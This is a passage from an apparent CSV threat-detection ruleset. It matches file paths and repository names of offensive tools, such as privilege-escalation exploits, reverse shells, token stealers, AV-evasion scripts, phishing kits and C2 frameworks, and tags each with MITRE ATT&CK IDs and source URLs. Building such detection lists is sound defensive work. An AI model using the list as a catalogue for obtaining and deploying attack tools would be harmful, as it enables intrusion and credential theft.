TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/tmp/chimera.ps1*",".{0,1000}\/tmp\/chimera\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/tmp/dcow *",".{0,1000}\/tmp\/dcow\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","942","392","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*/tmp/evil.sh*",".{0,1000}\/tmp\/evil\.sh.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*/tmp/exploit*",".{0,1000}\/tmp\/exploit.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*/tmp/FavFreak/*",".{0,1000}\/tmp\/FavFreak\/.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/tmp/geckodriver.tar.gz*",".{0,1000}\/tmp\/geckodriver\.tar\.gz.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/tmp/gitleaks*",".{0,1000}\/tmp\/gitleaks.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/tmp/gtfokey.pub*",".{0,1000}\/tmp\/gtfokey\.pub.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/tmp/host.ghost*",".{0,1000}\/tmp\/host\.ghost.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*/tmp/libpwn.c*",".{0,1000}\/tmp\/libpwn\.c.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/tmp/libpwn.so*",".{0,1000}\/tmp\/libpwn\.so.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/tmp/mac.ghost*",".{0,1000}\/tmp\/mac\.ghost.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*/tmp/metadata/na.elf*",".{0,1000}\/tmp\/metadata\/na\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*/tmp/metasploit_install*",".{0,1000}\/tmp\/metasploit_install.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/tmp/p0f.log*",".{0,1000}\/tmp\/p0f\.log.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tmp/payload.bin*",".{0,1000}\/tmp\/payload\.bin.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*/tmp/payload.ps1*",".{0,1000}\/tmp\/payload\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/tmp/payload.txt*",".{0,1000}\/tmp\/payload\.txt.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*/tmp/Phishing/documentation.pdf.zip*",".{0,1000}\/tmp\/Phishing\/documentation\.pdf\.zip.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*/tmp/r00tshell*",".{0,1000}\/tmp\/r00tshell.{0,1000}","offensive_tool_keyword","exploit-db","privilege escalation exploit pattern on https://www.exploit-db.com/exploits/38576","T1068 - T1548 - T1055 - T1088 - T1134 - T1221 - T1543 - T1547 - T1574","TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://www.exploit-db.com/exploits/38576","1","0","linux privesc","10","10","N/A","N/A","N/A","N/A" "*/tmp/resolution.txt*server.sh*",".{0,1000}\/tmp\/resolution\.txt.{0,1000}server\.sh.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*/tmp/revshell.exe*",".{0,1000}\/tmp\/revshell\.exe.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*/tmp/scanrepo.tar.gz*",".{0,1000}\/tmp\/scanrepo\.tar\.gz.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/tmp/smb_auth_temp_*.txt*",".{0,1000}\/tmp\/smb_auth_temp_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*/tmp/tmpfolder/pingoor.c*",".{0,1000}\/tmp\/tmpfolder\/pingoor\.c.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/tmp/tmpfolder/pingoor.h*",".{0,1000}\/tmp\/tmpfolder\/pingoor\.h.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/tmp/truffleHog.tar.gz*",".{0,1000}\/tmp\/truffleHog\.tar\.gz.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/tmp/vt-post-*.txt*",".{0,1000}\/tmp\/vt\-post\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/tmp/vt-results-*.txt*",".{0,1000}\/tmp\/vt\-results\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/tmp/wordlist.txt*",".{0,1000}\/tmp\/wordlist\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*/tn3270-screen.nse*",".{0,1000}\/tn3270\-screen\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/TokenPlayer.git*",".{0,1000}\/TokenPlayer\.git.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*/TokenStealer.git*",".{0,1000}\/TokenStealer\.git.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*/TokenStealing*",".{0,1000}\/TokenStealing.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*/TokenStomp.exe*",".{0,1000}\/TokenStomp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/TokenStripBOF*",".{0,1000}\/TokenStripBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","10","10","32","6","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" "*/TokenTactics.git*",".{0,1000}\/TokenTactics\.git.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*/TokenUniverse.git*",".{0,1000}\/TokenUniverse\.git.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*/TokenUniverse.zip*",".{0,1000}\/TokenUniverse\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*/Tokenvator/*",".{0,1000}\/Tokenvator\/.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*/tomcat-RH-root.sh*",".{0,1000}\/tomcat\-RH\-root\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/tools/BeaconTool/*",".{0,1000}\/tools\/BeaconTool\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/tools/DHCP.py*",".{0,1000}\/tools\/DHCP\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/tools/psexec.rb*",".{0,1000}\/tools\/psexec\.rb.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/Tools/ResHacker.exe*",".{0,1000}\/Tools\/ResHacker\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","false positive risk","6","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/Tools/spoolsystem/*",".{0,1000}\/Tools\/spoolsystem\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/Tools/Squeak/Squeak*",".{0,1000}\/Tools\/Squeak\/Squeak.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/toolsdownload/iepv.zip*",".{0,1000}\/toolsdownload\/iepv\.zip.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/toolsdownload/rdpv.zip*",".{0,1000}\/toolsdownload\/rdpv\.zip.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*/Tool-X.git*",".{0,1000}\/Tool\-X\.git.{0,1000}","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/Tool-X","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/top_mots_combo.7z*",".{0,1000}\/top_mots_combo\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "*/top-usernames-shortlist.txt*",".{0,1000}\/top\-usernames\-shortlist\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/tor -mindepth 1 -maxdepth 1 -type f *",".{0,1000}\/tor\s\-mindepth\s1\s\-maxdepth\s1\s\-type\sf\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/tor/torrc*",".{0,1000}\/tor\/torrc.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - 